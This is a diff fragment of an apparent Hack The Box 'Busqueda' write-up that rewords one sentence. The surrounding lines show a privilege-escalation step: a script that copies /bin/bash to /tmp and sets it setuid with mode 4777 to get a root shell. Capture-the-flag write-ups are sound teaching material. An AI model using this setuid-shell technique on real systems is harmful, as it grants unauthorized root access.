0hmsec/0hmsec.github.io/_posts/en/2025-02-01-htb-busqueda.md

 svc@busqueda:/tmp$ echo -e '#!/bin/bash\n\ncp /bin/bash /tmp/temp_bash\nchmod 4777 /tmp/temp_bash' > full-checkup.sh
 ```

-We are writting a script which will copy the `/bin/bash` file to a temporary file `/tmp/temp_bash` and also gives this temporary file full permission including the setuid bit.
+Here, we are writting a script which will copy the `/bin/bash` to a temporary file `/tmp/temp_bash` and also gives this temporary file full permission including the setuid bit.
 Thus, by running `/tmp/temp_bash`, we will be given a root shell.

 ```bash
 svc@busqueda:/tmp$ chmod +x full-checkup.sh